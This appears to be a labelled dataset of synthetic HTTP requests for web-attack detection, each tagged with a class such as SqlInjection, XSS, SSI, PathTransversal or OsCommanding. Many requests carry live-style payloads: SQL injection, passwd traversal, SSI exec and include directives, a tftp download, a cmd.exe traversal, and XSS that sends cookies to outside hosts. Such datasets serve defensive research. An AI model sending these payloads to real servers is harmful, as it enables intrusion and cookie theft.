Authorization: salmhs s3ethl=eSutSs
Range: 639-682,28229-
Referer: http://oIoE.uk/ut4e6f.asmx
TE: chunked;q=0.8,trailers
Trailer: Via
User-Agent: eo5hasta (tcU9xY1; r8Vl.9Iqr; o.fzvwoNQ)
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 902x0631
Via: uhepu/7.2 231.109.39.77, FTP/3.5 www.air3ytT.tiff, 8pe/4.8 1.44.241.238
Transfer-Encoding: compress
Upgrade: coeeIl/9.2, natae/9.1, hi4/9.9, 3tu3nt/4.6, epa5c/2.6
Warning: 674 28.181.161.239 "fsbetechtt6msa4eu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 76527711
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44285
Start - Id: 40942
class: SSI
GET /fadminkimg4XB8_ALPb@B/iSaqyce1na/s@ZwXWbFDNh-E/2R1CHhxAm7lthv-u.mspx?aecaeinEa=%3C%21--+%23odbc++++statement++%3D+%22select++eEAaul%2C+++++hhoRt%2C+5ilsyin++++from+vEdM+++++order++by++0%2C++++901%2C+9%22+++++--%3E&fknod9=ir&IHq58-L=716566 HTTP/1.1
Host: 175.67.105.42:80
Connection: close
Accept: text/xml;q=0.4, image/*, audio/*;q=0.9
Accept-Charset: x-mac-cyrillic
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: no-transform
Cookie: nxn=cbnp=Tbodyouyh1ib;szn5t=83403783
Cookie2: $Version="722"
Date: Sun, 28 Mar 04 06:58:10 CET
From: Taifhs@4loted.uk
If-Unmodified-Since: Wed, 26 Dec 07 03:13:48 CET
If-Match: "CXoL5WdS9.u_jzQyj3q8"
If-Range: "5mSE5ATSimASSQx3x7"
Max-Forwards: 7724
Proxy-Authorization: Basic ZW9jbm5zMjpIMUppY3Js
Authorization: ti5cm Taih6t=ii7te
Range: 4-
Referer: http://www.k2stEroe.st/sshkH/dteid2.fgf
TE: deflate,trailers,gzip
User-Agent: Mozilla/9.5 (X11; U; Open BSD i386 7.8; fa-ja; rv:9.7.4) Gecko/68692945
UA-CPU: MIPS
UA-Color: color8
UA-Pixels: 877x4813
Via: 4.8 www.rlet.jpg, 9.4 www.ekEo.png
Transfer-Encoding: gzip
----: ----------

null

End - Id: 40942
Start - Id: 40974
class: SqlInjection
GET /f5KYGejuo_/affkOmQp1E.y9/hqoT-P.Rm3t1_fk4/eziiehcl/hittokEettdo/xpQa9wl@2o0UNZpqY7n/eeofMaetqt/rbGNEy/asMKHOlC4YZ/eLEpzgZgPnJn/us2diYe1e3rsra.shtml?sh=k+&1k9_SbK@cdD=1oiy4iseee3eww HTTP/1.0
Host: 84.155.195.84
Connection: zsex
Accept: text/*, video/mpeg;q=0.5, video/*
Accept-Charset: *;q=0.7
Accept-Encoding: '; EXEC  master.dbo.sp_makewebtask  'c:\inetpub\wwwroot\rnra.html',   'SELECT     esoa7 FROM  er WHERE  xtype=''U'''
Accept-Language: 4tni-lazx, dbi-E7er, nhh-loR6nh;q=0.9, thtezJn-ridue
Cookie: ddt=04239;ife=38;shw=63;afgStLstsGs=89624
Cookie2: $Version="886"
Date: Sat, 13 Mar 04 04:53:31 CET
Expect: jcnei8e
If-Unmodified-Since: Wed, 09 Aug 06 17:28:24 UTC
If-Match: *
Max-Forwards: 831
Pragma: dsadnesa=jose1fe
Referer: http://www.enljt.de/3l5t1nka.php3
User-Agent: Mozilla/6.9 (Windows; U; WinNT 2.3; bl-li; rv:2.2.9) Gecko/35693182
Via: 7.6 46.187.182.182:578, 7.0 www.noD7nz.tiff
----: -------------------------------

null

End - Id: 40974
Start - Id: 41656
class: SqlInjection
GET /sqENBzm9TAw6p_NR.gif?pTrfx=%27+%29++++UNION+++ALL++SELECT+memofnT+++++FROM+++++ihmltRotrY+WHERE++%28+%27%27+++%3D++%27&eb3h=brssmlen&4Siqahtnss=+D44Csm&ztdYr=aei&pp0mV=xwisoz7ufb HTTP/1.0
Host: 57.105.15.172
Connection: close
Accept: audio/basic;q=0.0, application/rtf
Accept-Charset: iso-2022-jp;q=0.3, utf-7, shift_jis, x-mac-hebrew;q=0.9, windows-1250;q=0.3
Accept-Encoding: deflate;q=0.3
Accept-Language: *
Cache-Control: no-transform
Client-ip: 88.68.143.39
Cookie: z_36E4Q=irl~oeiu0o]htfxr phpp;tp=8027
Cookie2: $Version="96"
Date: Sat, 19 May 07 15:41:40 CET
ETag: W/"tK08tBHPggtEMtZ1I-o"
Expect: tdqm
From: oseas@soacs.biz
If-Modified-Since: Fri, 07 Jan 05 04:28:03 UTC
If-Unmodified-Since: Thu, 16 Sep 04 23:48:45 UTC
If-Match: *
If-None-Match: "63gK@fFCw5-Zlst@4L0"
If-Range: "kUR6PynGPM1Y0p4Tg"
Max-Forwards: 5456
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM bW9zbzZtbGVydGMyZXM3RW1vaXRSNGR1b2hyem51ZXY=
Authorization: ebDoe1 e2o6goee=Atbb0aec
Range: 0-,-4,4860-288700
Referer: http://aedE.net/hynehQlk/eyeko7y.jpg
TE: trailers,gzip;q=0.6,trailers
Trailer: If-Range
User-Agent: 2uoob7e (rKFUVDYDdF)
UA-CPU: MIPS
UA-Disp: 942,8019,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 232x3893
Via: HTTP/9.3 www.tieg.jpeg, HTTP/5.1 www.ittNf6.jpg
Transfer-Encoding: eloove; yhsdN=leuiowt
Upgrade: eelO/2.0, utnt/9.3, aSn/6.5
Warning: 553 www.mekn.jpg "dieiIfit2dki8e" 
X-Forwarded-For: 236.249.18.77
X-Serial-Number: 611965021882313
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41656
Start - Id: 36323
class: PathTransversal
GET /jnzBrkBXQ-WOx.c/hqelu5cintee0Csx7/Eerasn3otT/75onoas/j2iejewsPow6tieliypt/itsnin9ttEhcs/zlp/6e4UgQ/f5br.shtml?ta=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&zw5y-=613603&tmittshTwa=sunionechosTeeevalenTrwwEnTz0 HTTP/1.1
Host: 60.1.246.226
Connection: keep-alive
Accept: text/xml;q=0.7, video/*
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: *;q=0.4
Accept-Language: U-v7, t-who9qdWr;q=0.8, utalu-o6tsfe0, t-dothTiet;q=0.2
Cache-Control: no-transform
Client-ip: 227.250.97.152
Cookie: a7jnrgrgu2Y=tsfaeetn;bin1twuF=bElLvyXxo;zsnpstn3eaart=0;P4gxstyleDIl@b=ksnsSC|razru%li5~ w;edehy=0
Cookie2: $Version="21"
Date: Wed, 03 Sep 08 18:16:29 CET
ETag: W/"XVnSSkhMGncEq258"
Expect: eyzT
From: 5ygo@eiccrasaq.org
If-Modified-Since: Fri, 13 May 05 14:06:49 CET
If-Unmodified-Since: Mon, 29 Aug 05 07:59:16 GMT
If-Match: "0VFWhMvnXTBb7A6dOh"
If-None-Match: *
If-Range: Wed, 18 Jan 06 23:53:39 GMT
Max-Forwards: 31
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic aTFhdGw6bmFhc0ZIZWE=
Authorization: shamo iayeo4ls=unnxto8
Range: 94941-674,-88804,1546-98301
Referer: http://www.eroxwcm7.net/sAlrlh/t5ria5.jpg
TE: trailers,trailers,gzip;q=0.3
Trailer: User-Agent
User-Agent: 2SfaT/7.6.3.6
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 625x983
Via: 0.6 209.184.122.136:44654, FTP/9.5 www.nwomeWer.jpg, deh/2.2 www.ttsxys.shtml
Transfer-Encoding: deflate
Upgrade: cdl/2.8, oueiab/2.3, nfnoc/8.1
Warning: 156 85.95.63.97 "Leweeelritieh" 
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 876584717
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36323
Start - Id: 43562
class: OsCommanding
GET /smJaMpkJOY/oEAe/7TfaKsN3fT8nDtlkMvq/cE/n8irdottliracyrtwznm/Os2D-l.cfm?petkwzO7bnv=%27++++%3B+tftp+-c+++get++++www.sesi.com%3A%2Fesinme.tar&Hrue=%3FNnooU%3A2leatb&xetrcas=Em09aimkdeletesof&7hg6ecoohN=9456687298&inrIoea=aetnh7led3s0tLaMo HTTP/1.1
Host: www.criec.uk:894
Connection: close
Accept: text/plain;q=0.8
Accept-Charset: windows-1254;q=0.0, iso-8859-8, macintosh;q=0.4, euc-kr;q=0.4
Accept-Encoding: 
Accept-Language: a-euudndt7
Cache-Control: max-age=2644
Client-ip: 32.52.143.48
Cookie: dsdlaaLoee=R&n;tiqhfhnHuaaw=3338507827;xuaefe=asBeaVhncdeuic1us
Cookie2: $Version="2"
Date: Sat, 19 Aug 06 23:58:42 CET
ETag: W/"5iLoNVknU2PXMAfL"
Expect: 100-continue
From: enle@ymn9end.uk
If-Modified-Since: Thu, 02 Feb 06 24:52:44 CET
If-Unmodified-Since: Sat, 10 May 08 24:55:54 CET
If-Match: *
If-None-Match: "ZeRQ@_h8P4a_uONtlt"
If-Range: Mon, 28 Feb 05 23:10:35 GMT
Max-Forwards: 5
MIME-Version: 7.0
Pragma: in=eeY3titb
Proxy-Authorization: szoGA tiskrnt=veetaa
Authorization: dprin7 woie=reEn
Range: -262090,-9
Referer: http://Vei3snC.biz/Wi7x/6ehoh/etiuo/gCeRif.pl
TE: deflate,deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: gua65ll1X/5.1.3.9
UA-CPU: x86
UA-Disp: 1895,188,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 199x6158
Via: FTP/0.1 99.210.176.60, 1gh/9.6 66.137.93.84
Transfer-Encoding: identity
Upgrade: ogtr/7.3, ctr/1.8, dTuD/9.4, yoltsN/4.0, nt5ae/6.4
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 92.181.164.255
X-Serial-Number: 5097716489004151
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43562
Start - Id: 46756
class: XSS
GET /btkivadegbe6sint/loaz6q9GWnn2lu/eHviU2ktI8/aAFS3qY0vKgTXAv14NnN/en/cRCCQi/8UAoTdQNzX57/tNlrhp.nsf?ri93sbtwqbm=20434966&datyleeslbil=noder%2B%3E+sev3%25lelibN%29+un%3C&rnegwsmnnn=h8Sva9m%40m&TttaintanTElSsE=57&mS.l9Jxmlastdin=8760&lA=xxhRmailYem%3Baeudropemail&nqn91sepuUb=70&Diacoroaht1ha=hNt3pod9atsos&ttinaerhywacuhr=w-3C%40kT0M&doI9ahcsom=ese2wtoriaoshgbtn&nnucei2otehh=3103&r5kwooh=ea%5D HTTP/1.0
Host: 145.158.113.213
Connection: close
Accept: text/html, audio/x-wav
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.9
Client-ip: 39.174.238.228
Cookie: p6esfoysnrN=%Ptstdin passthrur+s e;vY65HWIidOblf=<div    style    =  "  width:  expression([window.open('http://141.212.214.235/leol.dll'+document.cookie);]);"   >
If-Match: "-4awrURIbvHZfJy"
Authorization: dvyHa nt3ss=hisel21
Referer: /etea/eaech/8tohe/l1He9h/Ie6y.htm
User-Agent: rtmttlhUd/2.6.2.9.6
Via: HTTP/8.4 167.142.26.140:333
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 46756
Start - Id: 40168
class: SSI
GET /hY6WZvSKa/rN/dlO0j_c-HLe-u3msqltA/9a3LyaFpSJ/lQn5MZaiHJ0/nsUWe68C6eLGZXz/r5a4lAsh2bk.ZsWmkj/m.1p1pu26.swf?YohBchicnls=2204&wToshrdncpal67=iobjectqh9y%3Deuie7a&Nsnas3eblcot=h4r%25h&Umphpre0Bbetween_jsm=R%26u&atyho9Att=iNDtZWoy&felevbbWa=nga&rneUiie3H=-t&cemtaetaey=%3C%21+++++%23%3C%21--+%23exec+++++cmd%3D%22id%22--%3E&4kEts=aelSaitza2kbedex4&ieTtuwKnh=beCgmfRw&Bxp_9Obk=5902&ttneeiEe13cae=otoexec%3B HTTP/1.1
Host: 48.94.163.102
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: min-fresh=0
Client-ip: 165.96.86.136
Cookie: VIItzQJqgroup byphplT=s.K.R;max=ft;lku1=m+ae;n5it4cgimtb=569
Cookie2: $Version="360"
Date: Sat, 28 Jan 06 20:51:15 UTC
ETag: W/"k_aCPWy5XqeILlOdj5S"
Expect: 100-continue
From: stce@ygsk.st
If-Modified-Since: Mon, 21 Aug 06 19:18:03 UTC
If-Unmodified-Since: Sun, 26 Aug 07 08:12:42 GMT
If-Match: *
If-None-Match: "PkjiZ_JK4GmOjIG"
If-Range: Sat, 13 Sep 08 08:30:38 UTC
Max-Forwards: 4
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic cGNuY3Njczplbm9ybTQ=
Authorization: NTLM bnNhTzVvaG96dGFubGljSWhyYXBlbTdzZXRtaGljZWhrdWZzcG8=
Range: 728-,7-688430
Referer: http://www.otdgeo.cz/ehfnrtym/p9on.gz
TE: trailers
Trailer: Warning
User-Agent: Mozilla/4.2 (compatible; Konqueror/3.1; Open BSD i386; rCereo; 3s4ezdsoie; Q8xqa2)
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 427x7361
Via: 0.0 20.23.193.181
Transfer-Encoding: compress
Upgrade: w70e/2.8, naoa/9.2, ror/0.7
Warning: 170 76.199.57.65 "sisbajy1tp1snjc" "Wed, 26 Aug 09 22:46:27 CET"
X-Forwarded-For: 237.110.243.93
X-Serial-Number: 06191135820
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40168
Start - Id: 43922
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.0
Host: www.f3e5hy.net
Connection: close
Accept: image/*, image/jpeg;q=0.2
Accept-Charset: iso-8859-1;q=0.1, x-mac-ce, windows-1252
Accept-Encoding: identity, deflate
Accept-Language: Ie6nzYyd-vzfeeed
Cache-Control: max-age=81
Client-ip: 22.30.133.135
Cookie: ti8oldhg=ndq;oet0=6767318;mdgtpsu9=ongriGolibqis8ee
Cookie2: $Version="50"
Date: Fri, 10 Dec 04 03:13:43 CET
ETag: W/"vie1Rh-65y4FyKK@u97g"
Expect: 100-continue
From: nehsxlsR@ou1hri.fr
If-Modified-Since: Sat, 19 Feb 05 05:22:48 UTC
If-Unmodified-Since: Thu, 05 Apr 07 12:11:41 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 54
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Basic dEFlNm1kMDpoZE9k
Authorization: i6h6 inyEtSLs=s0eHnr
Range: 6652-,-36477,66590-93
Referer: http://www.gGemia.net/wianb2il/YPsAA/tisa9lbz/ooisfbs.js
TE: gzip;q=0.5
Trailer: Expect
User-Agent: hwextji/6.8
UA-CPU: StrongARM
UA-Disp: 527,703,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 428x0275
Via: 4.3 18.7.121.254, FTP/7.5 233.118.60.9, FTP/1.0 www.dySlaw9o.html:8629
Transfer-Encoding: 3pir; riee=oetd
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 175 www.izidyp.gif "ortoaehswe5tr" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43922
Start - Id: 40574
class: SSI
GET /sesinevttiuunpf/f36boot.iniZnnbw.m/vwp-3r23R/h4T-an8Wbnmy9Xl/mVd-.js?L0az7g8htaccesA3includepk=601912&beqeondihweaohu=oua+wtt&r9aa=+ewindow.opent&r3OnvfpR=717943737&sg9ihuheiIt=%3C%21--%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++--%3E&getIon=715&Pr7onahrr2=etlxmlhchildee&mg=yobjectaa4s+Hvit&haas=romanafeuehe0z2u&nrisdL=038853&hu=5+0ate%3Erohtpassdsf&mrrdptsedstn8uR=tVO2 HTTP/1.1
Host: www.auksthfoe.biz
Connection: keep-alive
Accept: */*
Accept-Charset: big5, ks_c_5601-1987;q=0.4, iso-8859-1;q=0.5, hz-gb-2312;q=0.2
Accept-Encoding: compress;q=0.8, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 172.74.200.100
Cookie: EmolgetmAllyyn=30;object7Syd0=leOsdd'y;sea6coaoEe=23732428;Hslr9vpur=19231
Cookie2: $Version="3"
Date: Mon, 24 Jul 06 07:57:50 GMT
ETag: "FnQikxnnlglOXVUA1"
Expect: nnoh3ur=unoiiuae
From: ciHn@mdreeh.gov
If-Modified-Since: Sat, 29 Dec 07 05:21:54 CET
If-Unmodified-Since: Wed, 21 Jan 09 20:52:14 GMT
If-Match: "_IO18LmBvhx7kAnb4"
If-None-Match: *
If-Range: *
Max-Forwards: 9760
MIME-Version: 7.9
Pragma: ueo='Teo'
Proxy-Authorization: Digest nc=fd1FECD3
Authorization: Basic c1JTbmlyc2Q6bXRyMGZlbWw=
Range: -296381
Referer: /uupt.nsf
TE: deflate;q=0.9,trailers
Trailer: Host
User-Agent: a9eG4nDx http://www.tnbt.it
UA-CPU: PowerPC
UA-Disp: 563,477,16
UA-OS: WinNT
UA-Pixels: 0455x286
Via: FTP/6.4 193.1.211.237:356
Transfer-Encoding: identity
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 519 www.eejaeye.png "rslbjmqpxcnge" 
X-Forwarded-For: 26.88.83.25
X-Serial-Number: 56779
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40574
Start - Id: 39595
class: SSI
GET /uilurltsoe/jd.wElaGxJJyMbF3/ngr/passthru4NCftp8_F8F4Q/aoeeorneetk/ts0d/resPmASULAU/rneoNti8njr/eC/mdOHyRE_RitBdspDZzt/rSghr5oowrbshhiMrcd.exe?2W1E=Mbohnjatelz6udys&GwaecY=%3C%21--++%23include+++virtual%3D%22%2Fetc%2Fpasswd%22+--%3E&eORPa=%5Cm&oeheeO=isncwuh2p&oeAethcs=+le87tand&iItszeauthE=uenode+&uapZYatBtnsf=pbiudin&oioNSadiqlp=U3ngdn3wc8dAYi&libzBRWF=67579 HTTP/1.0
Host: 246.171.105.141
Connection: close
Accept: video/*, text/*, audio/basic;q=0.0
Accept-Charset: gb2312, iso-8859-15, x-mac-ce;q=0.8, isiri-3342;q=0.1, x-mac-arabic;q=0.7
Accept-Encoding: compress;q=0.9, identity;q=0.9
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 239.19.170.214
Cookie: dovdoiht8Ee=fSriAntb3rdee;oes6ur=ople61;tiSe=)as;evMpnepkrP=413eetenithrbast;ainri7ti8op7e=mwhere
Cookie2: $Version="7"
Date: Wed, 11 Oct 06 11:45:23 CET
ETag: W/"oVLo4-iYAWfQ2T33"
Expect: etree
From: k4wcg@aEdi7a2.de
If-Modified-Since: Tue, 22 Feb 05 09:17:14 UTC
If-Unmodified-Since: Tue, 21 Apr 09 11:36:36 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 18 Apr 05 20:03:53 CET
Max-Forwards: 35
MIME-Version: 2.2
Pragma: sie=iocfmnJ
Proxy-Authorization: NTLM c3B4Yml0cGFpaWk0YmVscWVpU2h0ZWRybGE3ZWluc3NlamlqbjZkb2Nq
Authorization: nHdi ga5e=ou2cdG
Range: 5591-,251722-40474
Referer: /hsnSa71e/Ly9einxr/pveilei/eoege/myEhja.png
TE: gzip;q=0.9,deflate;q=0.8
Trailer: Authorization
User-Agent: Mozilla/8.4 (Windows; U; WinNT 5.3; fr-UA; rv:4.1.9) Gecko/99365702
UA-Disp: 7073,179,8
UA-OS: Win9x
Via: 5.4 www.sery2na.shtml, tnrak/6.5 135.93.162.126, FTP/6.5 www.Oqc5x8uc.gif
Transfer-Encoding: MetdED; a2onthu=n4mae75q
Upgrade: t8veon/3.4, o1M/1.3, ooayr/1.5, edmt/1.1, ecik/3.7
Warning: 693 www.esm2no.shtml:36 "eEi40rmtp" "Sun, 28 Feb 10 20:28:26 CET"
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39595
Start - Id: 48398
class: XPathInjection
GET /l-sPHr1zKv3.Ksh_H7Gz/usrXAstyle7.metatG.T.jpg?Ta5eer=22&W5VBtCt=9%24cee1isice%26&oqtttsnsdnTzRh5=%7Ce&mtdLaL2=it%3Fehome4vusd%5CcfZiem%26l&9gpebsanhztp=nWacCvrc HTTP/1.1
Host: 221.10.147.100
Connection: keep-alive
Accept: application/*
Accept-Charset: windows-1255, hz-gb-2312;q=0.7, iso-8859-3;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 73.48.192.115
Cookie: 1iliaea=Oioai'  or (i   <     count(LdV/child::text()) and  j <  count(ns1p/child::comment()) and k   <     count(moSre/child::*)   )    or   'f9'  = ' tawe'     or;sh1leoND= m3n;sOtrrrlaStqng=a;ntetNnjw3=5827718;mrgrrtsNna5iy8l=uOs;oYdXiieEoi=9A
Cookie2: $Version="8"
Date: Tue, 17 Oct 06 15:43:09 GMT
ETag: W/"Gqax0ylWgLa_Q4qM"
Expect: chacin=wsyh
From: Eeet7cah@Ioed.uk
If-Modified-Since: Sun, 28 Jun 09 17:02:57 UTC
If-Unmodified-Since: Fri, 31 Oct 08 14:17:40 UTC
If-Match: *
If-None-Match: *
If-Range: "s7oI5-BzugjQIf1N9B"
Max-Forwards: 9270
MIME-Version: 1.4
Pragma: sxs='l7bce'
Proxy-Authorization: Basic dFR1bWV1OllSYnFzZQ==
Authorization: NTLM NG9FeGhzdG9ob3RvZmgyYXJ2NW9oYWRleXNuc2JUaGVlU0FtdG14Z3I3
Range: -645348
Referer: http://www.sccars.com/rgFmp/redo/ivihv/t8rnGUsq/wLereci.php
TE: deflate,gzip;q=0.4
Trailer: If-Modified-Since
User-Agent: oMQjGoF http://www.sG4ewt.st
UA-CPU: 68000
UA-Disp: 574,086,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 827x1746
Via: FTP/2.5 254.152.131.135, FTP/2.2 www.581eig.htm, FTP/1.6 106.133.212.33
Transfer-Encoding: gzip
Upgrade: qilofs/3.4, hho/6.8
Warning: 446 www.itbfo.jpg "dseEaeE6A6ett29fsdp" 
X-Forwarded-For: 60.162.169.118
X-Serial-Number: 04886
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48398
Start - Id: 46685
class: XSS
GET /rVmjP1J4wqOD/di1wPD1c6_nO/nmkBMwWClyKc2ExB.htm?efnietskspossat=958&4th8Lrco=+gelYciap9smexectm&l4include1CBXjboot.ini=As&vBLARscriptZv=8&rerrmwaoc=aHIsxa1k&darrl7Rl=tsmf&2wd50msa59o=h0+havingi&lo4=niaXtlntaseu&su1p7ca6ae=62&ri3i1te1r=mdoirasihntraeLa&wgetHxtermjGOtmpH=709&t1ozneerhoab=aWvnhvLPjOD&yRkkEjU=Eo6uGti HTTP/1.1
Host: 238.167.135.178:80
Connection: close
Accept: video/*, application/*;q=0.0
Accept-Charset: euc-jp, cp-932, isiri-3342;q=0.7, koi8-r;q=0.3
Accept-Encoding: compress;q=0.0, identity;q=0.5, compress, identity;q=0.9
Accept-Language: myo-6;q=0.9, rirpndac-nt1n, 7ae6shpR-ryia, wy1-eeTereh;q=0.9
Cache-Control: max-stale=50
Client-ip: 150.94.123.100
Cookie: eh1ls=nhr;s7LHh9iogerh=<img    src    = "     semase   "onmouseover   =  "   [document.location.replace   ('http://www.llattost.com/cgi-bin/nttr.cgi'+document.cookie);]"   >;cfaaNR24A5=2kHIs6bymn
Cookie2: $Version="92"
Date: Tue, 09 Oct 07 17:11:02 UTC
ETag: W/"PoOlOy_dU_0Z-cj63_GD"
Expect: 100-continue
From: ekionh@nouustph.biz
If-Modified-Since: Wed, 27 Feb 08 23:39:59 GMT
If-Unmodified-Since: Sat, 07 Oct 06 17:19:08 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 14 Aug 05 10:38:32 GMT
Max-Forwards: 4
MIME-Version: 9.1
Pragma: sredf='oS0nT'
Proxy-Authorization: Basic bmxobm5pOnJyMjRSTw==
Authorization: Digest response="e9Acd4Fde7CF31a5c0c0df1C7BFa31DA"
Range: 88653-1260,8019-4754,415-
Referer: /f2em6t7/hbee/ostlr/totitx3.png
TE: chunked;q=0.1,chunked
Trailer: If-None-Match
User-Agent: Mozilla/4.4 (X11; U; Linux i386 8.6; nj-Nh; rv:1.3.1) Gecko/10021705
UA-CPU: x86
UA-Disp: 445,3184,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 789x227
Via: 5.8 www.elhdhh.js:52, HTTP/9.7 www.Rokad9.jpg:170
Transfer-Encoding: compress
Upgrade: NNutal/3.3, Zdxhh/3.9
Warning: 142 198.194.142.50 "nwxrb2ahoh62t06" 
X-Forwarded-For: 36.143.183.170
X-Serial-Number: 673414445
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46685
Start - Id: 38790
class: LdapInjection
GET /bL54aPDgB78Hkt06o/n4F0LO/ee.asp?Lmv1b=4a%29%28+%7C++++%282feh%3D*%29&ONkdWMoOK7x=111335&craC0dfcti=04&aOzsmh5=esH240G%40B4&sietOme=0417&n0ia=stnn&oohfeagteiLutrl=l0E&uam3re0odw=chf%3F&urtnuydbofNuHsR=876 HTTP/1.1
Host: www.nsbhnd9tj.net
Connection: keep-alive
Accept: image/png, text/*;q=0.1
Accept-Charset: cp-932;q=0.2
Accept-Encoding: identity;q=0.3, deflate, compress;q=0.4, gzip;q=0.0, deflate
Accept-Language: *
Cache-Control: min-fresh=7312
Client-ip: 239.52.8.232
Cookie: Hedtekvlpogv=18;itatrrnhmtip=lbl;TlCRbgsound= 5 sh[]oeabeg~;execZftpWLP='t0rcptsmn
Cookie2: $Version="919"
Date: Wed, 19 Mar 08 06:14:10 UTC
ETag: "IBtj26H_ux12tRgi"
Expect: 100-continue
From: eedz@idneeachi.org
If-Modified-Since: Tue, 24 Aug 04 14:49:25 UTC
If-Unmodified-Since: Thu, 05 Nov 09 10:57:26 CET
If-Match: "RkFGcU.C@_W9IEaAfrm"
If-None-Match: *
If-Range: Mon, 19 Sep 05 20:18:53 UTC
Max-Forwards: 7
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: lnraO geepoll=oRsheku
Authorization: NTLM dHFUbHRhaGVlY2l4YXJPZWFobnNhYnNhUnJ0OWV0aGRtb3JzZW52aEVmQ2Nv
Range: 777808-9828,-9730,-076
Referer: http://udana6ht.de/teamt.js
TE: deflate;q=0.5,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/3.7 (Machintosh; U; PPC 4.3; fb-ro; rv:6.7.7) Gecko/84161438
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 601x604
Via: 7.3 3.128.75.251
Transfer-Encoding: qoase
Upgrade: cjw/0.8, roll/0.1, tytuee/5.7
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38790
Start - Id: 35938
class: PathTransversal
GET /alr8n/rmTP1kFgB2mgIO6IL-/i0easRLn/rUH/su9elne7ahI/i3pm2hxnUIrsiDeNra/aqlNMRBLIr/2xa1nteuTt/z7Y@i7zMYATP1c1tRfB2.mspx?stoii=2&or3ltelnet=ea%3DGwYtl%27roiimetY&peefh4o=88vil1kpG&txBomHfaeeh=auvossirEnao&icnbnq4fse=774402112&Rdnsetn0teo=%3C%21--++++%23include+virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E&edoaoso6tcsmnQg=574&erTtfjo=1&osy=dMG2MjVx61x&9t=ge5%3Co&8hacdplnfzcij=48540&enwhhjsdhl=muUW_6rr&ss1anrusdw=2o7s4uEnes HTTP/1.1
Host: www.d0btr9.com:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: t-nnel6, etT-8odoelW;q=0.3
Cache-Control: no-store
Client-ip: 111.208.189.237
Cookie: tyrtZ65s=7;CRJJV42ig=ehem8sinsertxselect$h;sesu=19492;wa=Inhy  fu
Cookie2: $Version="5"
Date: Fri, 01 May 09 12:34:01 CET
ETag: W/"KVz0darYpD@iPYSQ"
From: be1oUn2@8heteu9.de
If-Modified-Since: Mon, 07 Aug 06 03:03:17 UTC
If-Unmodified-Since: Wed, 10 May 06 21:02:53 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 24
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ei6idr"
Authorization: NTLM RW9zaG1yZjIzOWFuYXR0dHJjYW1ybjM3aUVzb2kweW8xaGxuYmZzd2to
